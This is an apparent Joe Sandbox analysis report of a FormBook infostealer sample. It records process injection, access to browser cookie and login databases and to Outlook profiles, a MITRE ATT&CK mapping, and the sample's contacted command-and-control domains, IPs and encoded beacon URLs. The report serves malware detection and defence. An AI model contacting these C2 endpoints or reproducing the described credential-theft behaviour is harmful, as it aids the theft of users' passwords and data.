Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\4sfN3Gx1vO.exe"	Jump to behavior
Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe	Process created: C:\Windows\SysWOW64\prevhost.exe "C:\Windows\SysWOW64\prevhost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

0_2_00570B62

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_00571663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00571663

Source: 4sfN3Gx1vO.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: YZKoIsKkwLJWPq.exe, 00000004.00000000.2319459138.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000004.00000002.3315196092.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000006.00000002.3315435200.0000000001A01000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: 4sfN3Gx1vO.exe, YZKoIsKkwLJWPq.exe, 00000004.00000000.2319459138.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000004.00000002.3315196092.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000006.00000002.3315435200.0000000001A01000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: YZKoIsKkwLJWPq.exe, 00000004.00000000.2319459138.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000004.00000002.3315196092.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000006.00000002.3315435200.0000000001A01000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: YZKoIsKkwLJWPq.exe, 00000004.00000000.2319459138.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000004.00000002.3315196092.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000006.00000002.3315435200.0000000001A01000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_00530698 cpuid

0_2_00530698

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_00588195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00588195

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_0056D27A GetUserNameW,

0_2_0056D27A

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_0054B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_0054B952

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_005142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_005142DE

Binary or memory string: mcupdate.exe

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.24e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.24e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3314303554.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3315298026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2392864199.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2393158045.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3315173119.0000000004CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2393615856.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3315527275.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\prevhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\prevhost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\prevhost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: 4sfN3Gx1vO.exe	Binary or memory string: WIN_81
Source: 4sfN3Gx1vO.exe	Binary or memory string: WIN_XP
Source: 4sfN3Gx1vO.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: 4sfN3Gx1vO.exe	Binary or memory string: WIN_XPe
Source: 4sfN3Gx1vO.exe	Binary or memory string: WIN_VISTA
Source: 4sfN3Gx1vO.exe	Binary or memory string: WIN_7
Source: 4sfN3Gx1vO.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.24e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.24e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3314303554.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3315298026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2392864199.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2393158045.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3315173119.0000000004CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2393615856.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3315527275.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_00591204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_00591204
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_00591806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00591806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	351 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
4sfN3Gx1vO.exe	72%	Virustotal		Browse
4sfN3Gx1vO.exe	76%	ReversingLabs	Win32.Trojan.AutoitInject
4sfN3Gx1vO.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.vilakodsiy.sbs	0%	Avira URL Cloud	safe
http://www.pku-cs-cjw.top/o8v1/	0%	Avira URL Cloud	safe
http://pku-cs-cjw.top/o8v1/?gjR=aBBw/QY72agee	0%	Avira URL Cloud	safe
http://www.vilakodsiy.sbs/w7eo/?gjR=87jvmPBkWfHORTeDIH6vw6Iilw+7ldDVauNTJPGD6Y0g6pEQO5IgtLUhmq8D9IsvGok6fcDnqazXOW08rDaond58uEkeXckhjfb1cCvnPNMW22V5tJ5baph3pqAG39XDrQ==&Fz=2jBhVn	0%	Avira URL Cloud	safe
http://www.vilakodsiy.sbs/w7eo/	0%	Avira URL Cloud	safe
http://www.030002513.xyz/95le/?Fz=2jBhVn&gjR=ZgllZHsiydchqBHBA1JMF+RoiwLw/ScJ/Jj32S4NIs+PSlV3776FANxFoYb4iH80r13xZ8RWQuyuUHwO/KTQwNAs4TqSGhVWgu7Bj48jZrfSqhqsOqTV9cKaFb+b133wug==	0%	Avira URL Cloud	safe
http://www.mbakjisoo.site/s7cs/?gjR=XBO9aoYe0c4EV2lGWX/eqScH3WB2DUU8GMnJuxCb2bBG6S8RD/F6utRSsBVbsw81jNVeG9r0NAJ+O+sM6di/BOZEjzyU06k1t/5HTi0LrCapjHiQT7axV8Hb4u3QDZSGIw==&Fz=2jBhVn	0%	Avira URL Cloud	safe
http://www.pku-cs-cjw.top/o8v1/?gjR=aBBw/QY72agee++wmgm8YU8t73l2MhHHcyuYQPaRiLcCJdiW+8Frjxd5MkTQnyD8TNGws+KrSP+UmrRcv8qZyBqG40jUHkhwK60VpuN0UbWNahjAXTIav6KJb07qfMmdjQ==&Fz=2jBhVn	0%	Avira URL Cloud	safe
http://www.mbakjisoo.site/s7cs/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.030002513.xyz	161.97.142.144	true	true	unknown
www.vilakodsiy.sbs	104.21.64.1	true	true	unknown
187370.github.io	185.199.108.153	true	true	unknown
mbakjisoo.site	172.96.187.60	true	true	unknown
www.mbakjisoo.site	unknown	unknown	false	unknown
www.pku-cs-cjw.top	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.vilakodsiy.sbs/w7eo/	true	Avira URL Cloud: safe	unknown
http://www.mbakjisoo.site/s7cs/	true	Avira URL Cloud: safe	unknown
http://www.030002513.xyz/95le/?Fz=2jBhVn&gjR=ZgllZHsiydchqBHBA1JMF+RoiwLw/ScJ/Jj32S4NIs+PSlV3776FANxFoYb4iH80r13xZ8RWQuyuUHwO/KTQwNAs4TqSGhVWgu7Bj48jZrfSqhqsOqTV9cKaFb+b133wug==	true	Avira URL Cloud: safe	unknown
http://www.mbakjisoo.site/s7cs/?gjR=XBO9aoYe0c4EV2lGWX/eqScH3WB2DUU8GMnJuxCb2bBG6S8RD/F6utRSsBVbsw81jNVeG9r0NAJ+O+sM6di/BOZEjzyU06k1t/5HTi0LrCapjHiQT7axV8Hb4u3QDZSGIw==&Fz=2jBhVn	true	Avira URL Cloud: safe	unknown
http://www.pku-cs-cjw.top/o8v1/?gjR=aBBw/QY72agee++wmgm8YU8t73l2MhHHcyuYQPaRiLcCJdiW+8Frjxd5MkTQnyD8TNGws+KrSP+UmrRcv8qZyBqG40jUHkhwK60VpuN0UbWNahjAXTIav6KJb07qfMmdjQ==&Fz=2jBhVn	true	Avira URL Cloud: safe	unknown
http://www.vilakodsiy.sbs/w7eo/?gjR=87jvmPBkWfHORTeDIH6vw6Iilw+7ldDVauNTJPGD6Y0g6pEQO5IgtLUhmq8D9IsvGok6fcDnqazXOW08rDaond58uEkeXckhjfb1cCvnPNMW22V5tJ5baph3pqAG39XDrQ==&Fz=2jBhVn	true	Avira URL Cloud: safe	unknown
http://www.pku-cs-cjw.top/o8v1/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pku-cs-cjw.top/o8v1/?gjR=aBBw/QY72agee	prevhost.exe, 00000005.00000002.3316055880.0000000005DE8000.00000004.10000000.00040000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000006.00000002.3315842528.0000000003AB8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	prevhost.exe, 00000005.00000003.2583327378.00000000080EE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.vilakodsiy.sbs	YZKoIsKkwLJWPq.exe, 00000006.00000002.3317083963.000000000583E000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
161.97.142.144	www.030002513.xyz	United States	51167	CONTABODE	true
172.96.187.60	mbakjisoo.site	Canada	32475	SINGLEHOP-LLCUS	true
104.21.64.1	www.vilakodsiy.sbs	United States	13335	CLOUDFLARENETUS	true
185.199.108.153	187370.github.io	Netherlands	54113	FASTLYUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587791
Start date and time:	2025-01-10 18:02:46 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	4sfN3Gx1vO.exe renamed because original name is a hash value
Original Sample Name:	e1c5b7a7fa4b308e50aa7061dd1e691cd253f63dc99745977164ec5d5311047a.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@4/4
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 91% Number of executed functions: 56 Number of non-executed functions: 287
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
12:04:48	API Interceptor	1794103x Sleep call for process: prevhost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
161.97.142.144	SC_TR11670000_pdf.exe	Get hash	malicious	FormBook	Browse	www.030002059.xyz/er88/
	RFQ3978 39793980.pdf.exe	Get hash	malicious	FormBook	Browse	www.030002350.xyz/1a7n/
	SHIPPING DOCUMENTS_PDF.exe	Get hash	malicious	FormBook	Browse	www.070001813.xyz/gn0y/
	PO2412010.exe	Get hash	malicious	FormBook	Browse	www.070002018.xyz/6m2n/
	New Purchase Order.exe	Get hash	malicious	FormBook	Browse	www.070001325.xyz/gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2
	Quotation Validity.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.070002018.xyz/6m2n/
	Order MEI PO IM202411484.exe	Get hash	malicious	FormBook	Browse	www.030002613.xyz/xd9h/
	Documents.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.030002449.xyz/cfqm/
	PAYMENT_TO_NFTC_(CUB)_26-11-24.doc	Get hash	malicious	DarkTortilla, FormBook	Browse	www.070001955.xyz/7zj0/
	W3MzrFzSF0.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.54248711.xyz/jm2l/
172.96.187.60	r6lOHDg9N9.exe	Get hash	malicious	FormBook	Browse	www.dalong.site/s20z/
	PO-78140924.BAT.PDF.exe	Get hash	malicious	FormBook	Browse	www.dalong.site/v2c3/
	rP0n___87004354.exe	Get hash	malicious	FormBook	Browse	www.dalong.site/v2c3/
	DOC092024-0431202229487.exe	Get hash	malicious	FormBook	Browse	www.dalong.site/v2c3/
	xU0wdBC6XWRZ6UY.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.resmierabaru20.shop/ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=3z9oRqqmd6FbtNg9CkHjvIkeoG86+7PKpZbS0bbY4gI7z8JQO6bI5gwIdi8ZdM48HBzoDxHL8Q==
104.21.64.1	1162-201.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/utww/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/3u0p/
	Sales Acknowledgement - HES #982323.pdf	Get hash	malicious	Unknown	Browse	ordrr.statementquo.com/QCbxA/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	adsfirm.com/administrator/index.php
	PO2412010.exe	Get hash	malicious	FormBook	Browse	www.bser101pp.buzz/v89f/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
187370.github.io	DHL.exe	Get hash	malicious	FormBook	Browse	185.199.110.153

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SINGLEHOP-LLCUS	http://atozpdfbooks.com	Get hash	malicious	Unknown	Browse	108.178.23.115
	https://www.bing.com/ck/a?!&&p=3c39a9f42e445bf68e8df296bb1fae53d0c972b7afa34ab05d6ca3737dc8872cJmltdHM9MTczNjM4MDgwMA&ptn=3&ver=2&hsh=4&fclid=2ffa23fd-270b-62aa-06ef-300e230b6c77&u=a1aHR0cHM6Ly93d3cuYmluZy5jb20vYWxpbmsvbGluaz91cmw9aHR0cHMlM2ElMmYlMmZ3d3cuYWxwaGFzdXJhbmNlLmNvbSUyZiZzb3VyY2U9c2VycC1sb2NhbCZoPUE1Z0FJY1RpY2tXbGRHJTJidFFwJTJmY0dnQ3Z3Tmg4UmZjRXBwQmdUTGlNOEtNJTNkJnA9bHdfdHAmaWc9QTlFRTIyOTNCQzJGNDgyMDlGMTkyNEFBOUQ4MTUyNkYmeXBpZD1ZTjg3M3gxNzg2NjcxMDE2NTE1NDQyOTA3NA&ntb=1	Get hash	malicious	Unknown	Browse	67.212.173.75
	Fantazy.m68k.elf	Get hash	malicious	Unknown	Browse	65.62.59.148
	XL-1-6-25-(EXCEL LATEST 2025).html	Get hash	malicious	HTMLPhisher	Browse	109.199.112.156
	miori.sh4.elf	Get hash	malicious	Unknown	Browse	65.63.38.172
	AZfDGVWF68.pdf	Get hash	malicious	Unknown	Browse	67.212.184.148
	Fantazy.x86.elf	Get hash	malicious	Unknown	Browse	173.236.124.78
	Hilix.x86.elf	Get hash	malicious	Mirai	Browse	65.62.12.161
	botx.m68k.elf	Get hash	malicious	Mirai	Browse	65.63.172.135
	db0fa4b8db0333367e9bda3ab68b8042.i686.elf	Get hash	malicious	Mirai, Gafgyt	Browse	199.26.214.9
CONTABODE	82eqjqLrzE.exe	Get hash	malicious	AsyncRAT	Browse	144.91.79.54
	DF2.exe	Get hash	malicious	Unknown	Browse	173.249.2.110
	Electrum-bch-4.4.2-x86_64.AppImage.elf	Get hash	malicious	Unknown	Browse	173.249.11.35
	bot.m68k.elf	Get hash	malicious	Mirai	Browse	95.212.118.93
	bot.mips.elf	Get hash	malicious	Mirai	Browse	95.212.118.77
	SC_TR11670000_pdf.exe	Get hash	malicious	FormBook	Browse	161.97.142.144
	payload-c17f7df6-cf80-43d5-8c60-eca90366debb.exe	Get hash	malicious	Metasploit	Browse	178.238.231.204
	RFQ3978 39793980.pdf.exe	Get hash	malicious	FormBook	Browse	161.97.142.144
	ORDER-401.exe	Get hash	malicious	FormBook	Browse	161.97.142.144
	SHIPPING DOCUMENTS_PDF.exe	Get hash	malicious	FormBook	Browse	161.97.142.144
CLOUDFLARENETUS	smQoKNkwB7.exe	Get hash	malicious	FormBook	Browse	104.21.18.171
	https://www.shinsengumiusa.com/mrloskie	Get hash	malicious	Unknown	Browse	104.16.79.73
	qlG7x91YXH.exe	Get hash	malicious	FormBook	Browse	104.21.80.1
	44742054371077666.js	Get hash	malicious	Strela Downloader	Browse	172.64.41.3
	http://atozpdfbooks.com	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://infarmbureau.com	Get hash	malicious	Unknown	Browse	104.16.40.28
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	zAK7HHniGW.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	MtxN2qEWpW.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1

Process:	C:\Windows\SysWOW64\prevhost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\autF2F0.tmp

Download File

Process:	C:\Users\user\Desktop\4sfN3Gx1vO.exe
File Type:	data
Category:	dropped
Size (bytes):	15008
Entropy (8bit):	7.580677798306826
Encrypted:	false
SSDEEP:	384:M9/RwgFdNQgZsxLOxw37junLf4LgS/mchHoboAfJlUYd9GpL:MR/fQgOOQfgUr3hIcADBqpL
MD5:	83386E8A3E3CF1EEF6C2B14FBCF1EFAB
